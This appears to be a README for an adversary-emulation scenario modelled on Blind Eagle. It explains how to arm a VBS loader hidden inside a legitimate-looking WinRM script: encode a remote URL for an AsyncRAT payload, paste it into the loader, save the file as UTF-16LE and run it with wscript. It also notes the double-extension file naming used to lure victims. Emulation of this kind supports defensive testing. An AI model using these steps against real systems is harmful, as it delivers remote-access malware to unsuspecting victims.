Blind Eagle is known to use VBS loaders as a second stage or later loader of malware infection1,2,3,4,5. The loader for this scenario is based on a variant used in more recent campaigns. The VBS loader is hidden inside of a seemingly legitimate winRM vbs script. The purpose of this loader is to downlod and execute the second stage DLL, and is typically also targeted for persistence by the second stage DLL loader.
The loader should be populated with the correct URL for the final payload on line 344
. The file-ops.py
script has a function to encode the URL properly.
Typically the vbs file will be named according to the current campaigns pretext and use a double extension such as pdf.vbs2. In some instances the payload will also be compressed into a .uue file or another type of zip/compressed file1,2. Simply double clicking the file will set off execution.
To execute via CLI:
wscript.exe .\eagle_loader.vbs
the VB loader can have issues running the PowerShell script due to the Unicode characters. Ensuring that the VB loader is saved with UTF-16LE encoding will allow PowerShell to run and parse the Unicode URL on line 344 properly.
To save the file as UTF16-LE You can use Visual Studio Code - in the lower right corner of the window the encoding should be listed:
If VSCode shows a different value you can click the encoding and choose "Save With Encoding" from the action menu:
- Run
file-ops.py
with the-u
flag to generate a URL pointing toasy.txt
(asyncrat payload)
on your remote host. This will save a file calledurl.txt
in the current folder
py.exe .\file-ops.py -u http://<url>/<to>/asy.txt
- Open
url.txt
in VSCode and copy string into line 344 between the single quotes just afterUUkXaLU = "e').G44☝░@4�tM44☝░@4�thod('VAI').Invok44☝░@4�($null, [obj44☝░@4�ct[]] ('